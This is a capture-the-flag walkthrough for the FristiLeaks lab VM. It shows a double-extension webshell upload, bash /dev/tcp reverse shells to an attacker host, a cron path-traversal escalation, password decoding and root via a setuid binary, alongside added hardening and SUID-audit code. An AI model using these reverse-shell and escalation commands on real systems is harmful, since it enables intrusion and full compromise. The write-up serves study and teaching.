VulnHub – FristiLeaks

Download: https://www.vulnhub.com/entry/fristileaks-13,133/

Environment setup

I used Oracle VM VirtualBox: choose Import Appliance, import the VM and start it.

Getting to work

Web application

Port 80 is open with a web service, so have a look at it.

Viewing the page source shows:

Goal: get UID 0 (root) and read the special flag file.

Nothing useful yet, so run a directory scan.

robots.txt lists a few paths.

Visiting them gives no hint.

Next, the images directory.

Following the hint in the image, try http://192.168.0.125/fristi/

Weak passwords get nowhere; look at the page source.

<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->

This was left by eezeepz.

Further down:

This base64 string is obviously broken up by line wrapping; remove the line breaks and decode it.


It turns out to be an image, so decode the base64 and save it to a file:

import base64
body = raw_input("input:")             # paste the base64 string with the line breaks removed
file_new = open("flag.png", 'wb')      # binary mode: the decoded data is a PNG
file_new.write(base64.b64decode(body))
file_new.close()

The image shows what should be a password: keKkeKKeKKeKkEkkEk

Log in with

username:eezeepz&password=keKkeKKeKKeKkEkkEk

Try uploading a PHP file; the response is:

Sorry, is not a valid file. Only allowed are: png,jpg,gif
Sorry, file not uploaded

Test whether the server parses double extensions: upload yijuhua.php.png containing a one-line webshell, then request it.


It is executed as PHP, so connect with the Caidao webshell client.

[/var/www/html/fristi/uploads/]$ whoami
apache

Only a low-privileged user.
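The upload form above only reports "Only allowed are: png,jpg,gif", and a file named yijuhua.php.png still got through and was run as PHP. The following Python is an added example, not the VM's upload code (which the page does not show): it reproduces the kind of last-extension-only check that lets a double extension pass, beside a hardened check that requires exactly one extension, a conservative file stem and leading bytes that match the claimed image type. The sample data and the function names are constructed for this illustration.

```python
import os
import re

# Extensions the page's form says it accepts.
ALLOWED = {"png", "jpg", "gif"}

def weak_extension_check(filename):
    """Constructed flaw: only the text after the LAST dot is compared,
    so 'yijuhua.php.png' is accepted even though a handler mapping
    that matches '.php' anywhere in the name will still execute it."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED

# Leading bytes of the three permitted image formats.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",  # covers GIF87a and GIF89a
}

# Stem of the stored name: letters, digits, '_' and '-' only, so there is
# no second extension and nothing else for a handler mapping to match.
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

def hardened_upload_check(filename, data):
    """Return (accepted, reason). Requires exactly one extension, a safe
    stem, an allow-listed extension and matching magic bytes."""
    base = os.path.basename(filename)          # drop any directory part
    parts = base.split(".")
    if len(parts) != 2:
        return False, "exactly one extension required"
    stem, ext = parts[0], parts[1].lower()
    if not SAFE_STEM.match(stem):
        return False, "unsafe characters in name"
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    return True, "ok"

# Constructed samples: a minimal PNG header, and text that is not an image.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR"
TEXT_SAMPLE = b"<?php echo 1; ?>"

if __name__ == "__main__":
    for name, data in [("yijuhua.php.png", TEXT_SAMPLE),
                       ("photo.png", PNG_SAMPLE),
                       ("photo.png", TEXT_SAMPLE)]:
        print(name, "weak:", weak_extension_check(name),
              "hardened:", hardened_upload_check(name, data))
```

Even with this check in place, the upload directory itself should be configured so the web server never hands its contents to the PHP engine; a name filter alone does not fix a handler that executes files by a pattern in the name.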

Privilege escalation

First use Caidao's virtual terminal to send back a reverse shell, which is easier to work in:

bash -i >& /dev/tcp/192.168.0.106/7777 0>&1

Listen locally with nc.

Browse around with Caidao first for anything important.

The home directory contains admin, fristigod and eezeepz.

bash-4.1$ ls -la
ls -la
total 28
drwxr-xr-x. 5 root root 4096 Nov 19 2015 .
dr-xr-xr-x. 22 root root 4096 Feb 9 05:04 ..
drwx------. 2 admin admin 4096 Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 2015 fristigod

In the eezeepz directory there is a notes.txt:

Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry

This hint says /tmp/runthis is executed as the admin user every few minutes, but the commands are restricted. Here I try to have it send back a shell with admin's privileges.

bash-4.1$ echo "bash -i >& /dev/tcp/192.168.0.106/9999 0>&1" > /tmp/runthis
echo "bash -i >& /dev/tcp/192.168.0.106/9999 0>&1" > /tmp/runthis

A few minutes later:

bash-4.1$ cat cronresult
cat cronresult
command did not start with /home/admin or /usr/bin

Change it and try again, using directory traversal to get around the restriction:

bash-4.1$ echo "/usr/bin/../../../bin/bash -i >& /dev/tcp/192.168.0.106/9999 0>&1" > /tmp/runthis
echo "/usr/bin/../../../bin/bash -i >& /dev/tcp/192.168.0.106/9999 0>&1" > /tmp/runthis

This gives a shell as admin.
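The cronresult message "command did not start with /home/admin or /usr/bin" shows the cron script only compares the literal text of the command path against two prefixes, which is why a path that begins with /usr/bin but climbs back out with ".." is accepted. The Python below is an added example and not the VM's cronjob.py (whose source the page does not show): it reproduces that prefix check, then shows the hardened form, which normalises the path before comparing it and requires the allowed directory to be followed by a separator. The sample runthis contents, the allow-list and all function names are constructed for this illustration.

```python
import os
import shlex

# Allowed command directories, as stated in the notes.txt on the page.
ALLOWED_DIRS = ("/home/admin", "/usr/bin")

def weak_check(line):
    """Constructed reproduction of the check implied by the error message:
    the first token is compared as text, so '/usr/bin/../../../bin/bash'
    and even '/usr/binx/anything' start with an allowed prefix."""
    argv = shlex.split(line)
    if not argv:
        return False
    return argv[0].startswith(ALLOWED_DIRS)

def hardened_check(line):
    """Normalise the path before comparing it with the allow-list.
    os.path.normpath collapses '..' and '.' lexically; on a live host
    os.path.realpath should be applied as well so a symlink cannot point
    out of the directory. The trailing '/' in the comparison stops
    '/usr/binx' from being treated as inside '/usr/bin'."""
    argv = shlex.split(line)
    if not argv or not argv[0].startswith("/"):
        return False                    # relative paths are never allowed
    resolved = os.path.normpath(argv[0])
    return any(resolved.startswith(d + "/") for d in ALLOWED_DIRS)

def filter_runthis(text):
    """Apply the hardened check to every line of a runthis file and return
    (accepted_lines, rejected_lines); nothing is executed here."""
    accepted, rejected = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        (accepted if hardened_check(line) else rejected).append(line)
    return accepted, rejected

# Constructed sample runthis contents: two legitimate checks, two traversal attempts.
SAMPLE_RUNTHIS = """/usr/bin/id
/home/admin/df -h
/usr/bin/../../../bin/bash -c "id"
/home/admin/../../bin/cat /etc/passwd
"""

if __name__ == "__main__":
    ok, bad = filter_runthis(SAMPLE_RUNTHIS)
    print("accepted:", ok)
    print("rejected:", bad)
```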

[admin@localhost ~]$ cat cryptpass.py
cat cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult

[admin@localhost ~]$ cat cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq

[admin@localhost ~]$ cat whoisyourgodnow.txt
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

There is an encryption script and two ciphertexts; write a decryption script that reverses the transform:

import base64,codecs,sys
def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')
def decodeString(str):
    # undo the steps in reverse: reverse the string, rot13 (its own inverse), then base64-decode
    stt = codecs.encode(str[::-1], 'rot13')
    return base64.b64decode(stt)
#cryptoResult=encodeString(sys.argv[1])
cryptoResult=decodeString(sys.argv[1])
print cryptoResult

C:\Users\12517\Desktop
λ python test.py mVGZ3O3omkJLmy2pcuTq
thisisalsopw123
C:\Users\12517\Desktop
λ python test.py =RFn0AKnlMHMPIzpyuTI0ITG
LetThereBeFristi!

That gives two passwords.
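The decryption script above is Python 2 (print statement, str/bytes not distinguished). As an added example, not code from the page or the VM, here is a Python 3 version of the same transform with an explicit round-trip check; the function names are my own, and the two ciphertexts are the ones recovered from the admin home directory above.

```python
import base64
import codecs

def encode_string(plaintext):
    """The transform in cryptpass.py: base64-encode, reverse, then rot13.
    Python 3 needs explicit conversions: b64encode takes bytes, while the
    rot13 codec works on str."""
    b64 = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")

def decode_string(ciphertext):
    """Inverse of encode_string. rot13 is its own inverse and acts one
    character at a time, so it commutes with reversal: undo rot13, reverse,
    then base64-decode. A leading '=' in a ciphertext (as in
    whoisyourgodnow.txt) is just base64 padding that was reversed too."""
    b64 = codecs.encode(ciphertext, "rot13")[::-1]
    return base64.b64decode(b64).decode("utf-8")

def round_trips(plaintext):
    """Sanity check that decode_string really inverts encode_string."""
    return decode_string(encode_string(plaintext)) == plaintext

# The two ciphertexts found on the box (from the page).
CIPHERTEXTS = ["mVGZ3O3omkJLmy2pcuTq", "=RFn0AKnlMHMPIzpyuTI0ITG"]

if __name__ == "__main__":
    for c in CIPHERTEXTS:
        print(c, "->", decode_string(c))
    print("round trip ok:", all(round_trips(p) for p in ("a", "password", "LetThereBeFristi!")))
```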

[admin@localhost ~]$ su fristigod
su fristigod
standard in must be a tty

Searching online shows this comes down to how su is implemented: some builds of su check that standard input is a tty and refuse otherwise, while others will read the password from whatever stdin is. The fix is to give the shell a pty:

python -c 'import pty; pty.spawn("/bin/sh")'

[admin@localhost ~]$ python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import pty; pty.spawn("/bin/sh")'
sh-4.1$ ls
ls
cat cronjob.py cryptpass.py echo grep whoisyourgodnow.txt
chmod cryptedpass.txt df egrep ps
sh-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!
bash-4.1$ whoami
whoami
fristigod
bash-4.1$ pwd
pwd
/var/fristigod
bash-4.1$ ls -la
ls -la
total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff

The .secret_admin_stuff directory contains a file named doCom:

-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom

Then look back at the shell history:

bash-4.1$ cat .bash_history
cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

Clearly SUID can be used to escalate privileges here; list the setuid-root binaries anyway:

bash-4.1$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/fusermount
/bin/umount
/bin/su
/bin/ping
/bin/ping6
/sbin/pam_timestamp_check
/sbin/unix_chkpwd
/usr/bin/crontab
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/passwd
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/usr/sbin/suexec
/usr/sbin/usernetctl
/var/fristigod/.secret_admin_stuff/doCom
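Everything in that list except the last entry is a stock system binary; doCom is a setuid and setgid root file sitting in a hidden directory under a user's home. The Python below is an added example of how a defender would turn this kind of find output into an alert: it compares each path against a baseline of expected setuid-root binaries, flags anything outside the system binary directories or inside a hidden directory, and parses an ls -l mode string for the s bits. It is not code from the page; the baseline is constructed here from the stock entries of the output above (a real one comes from a clean reference host or the package manager), and the function names are my own.

```python
# Expected setuid-root binaries on a stock install of this kind of system.
# Constructed from the stock entries in the find output above.
BASELINE = {
    "/bin/mount", "/bin/fusermount", "/bin/umount", "/bin/su",
    "/bin/ping", "/bin/ping6", "/sbin/pam_timestamp_check",
    "/sbin/unix_chkpwd", "/usr/bin/crontab", "/usr/bin/chsh",
    "/usr/bin/sudo", "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/chage",
    "/usr/bin/gpasswd", "/usr/bin/passwd", "/usr/libexec/openssh/ssh-keysign",
    "/usr/libexec/pt_chown", "/usr/sbin/suexec", "/usr/sbin/usernetctl",
}

# Directories where setuid-root binaries normally live.
SYSTEM_BIN_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                   "/usr/libexec/", "/usr/lib/", "/usr/lib64/")

def audit_suid(find_output):
    """Given the text of `find / -user root -perm -4000 -print`, return
    (path, reasons) for every entry that is not in the baseline."""
    findings = []
    for line in find_output.splitlines():
        path = line.strip()
        if not path or path in BASELINE:
            continue
        reasons = ["not in baseline"]
        if not path.startswith(SYSTEM_BIN_DIRS):
            reasons.append("outside system binary directories")
        if "/." in path:
            reasons.append("hidden directory component")
        findings.append((path, "; ".join(reasons)))
    return findings

def parse_ls_mode(ls_line):
    """Parse one `ls -l` line: report owner and whether setuid/setgid are
    set. In the mode string the setuid bit replaces the owner 'x' (index 3)
    and the setgid bit the group 'x' (index 6); 'S' means set but not
    executable."""
    fields = ls_line.split()
    mode = fields[0]
    return {"owner": fields[2],
            "setuid": mode[3] in "sS",
            "setgid": mode[6] in "sS"}

# Constructed input: the lines of the find output on the page.
SAMPLE_FIND = """/bin/mount
/bin/fusermount
/bin/umount
/bin/su
/bin/ping
/bin/ping6
/sbin/pam_timestamp_check
/sbin/unix_chkpwd
/usr/bin/crontab
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/passwd
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/usr/sbin/suexec
/usr/sbin/usernetctl
/var/fristigod/.secret_admin_stuff/doCom
"""

if __name__ == "__main__":
    for path, why in audit_suid(SAMPLE_FIND):
        print(path, "->", why)
    print(parse_ls_mode("-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom"))
```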

Run the commands seen in .bash_history:

bash-4.1$ sudo -u fristi ./doCom id
sudo -u fristi ./doCom id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
bash-4.1$ sudo -u fristi ./doCom ls /
sudo -u fristi ./doCom ls /
bin dev home lib64 media opt root selinux sys usr
boot etc lib lost+found mnt proc sbin srv tmp var
bash-4.1$ sudo -u fristi ./doCom ls /root
sudo -u fristi ./doCom ls /root
fristileaks_secrets.txt
bash-4.1$ sudo -u fristi ./doCom cat /root/fristileaks_secrets.txt
sudo -u fristi ./doCom cat /root/fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1

Alternatively:

bash-4.1$ sudo -u fristi ./doCom bash -i >& /dev/tcp/192.168.0.106/6666 0>&1
sudo -u fristi ./doCom bash -i >& /dev/tcp/192.168.0.106/6666 0>&1

λ nc -lvnp 6666
listening on [any] 6666 ...
connect to [192.168.0.106] from (UNKNOWN) [192.168.0.125] 44788
bash-4.1# whoami
whoami
root
bash-4.1#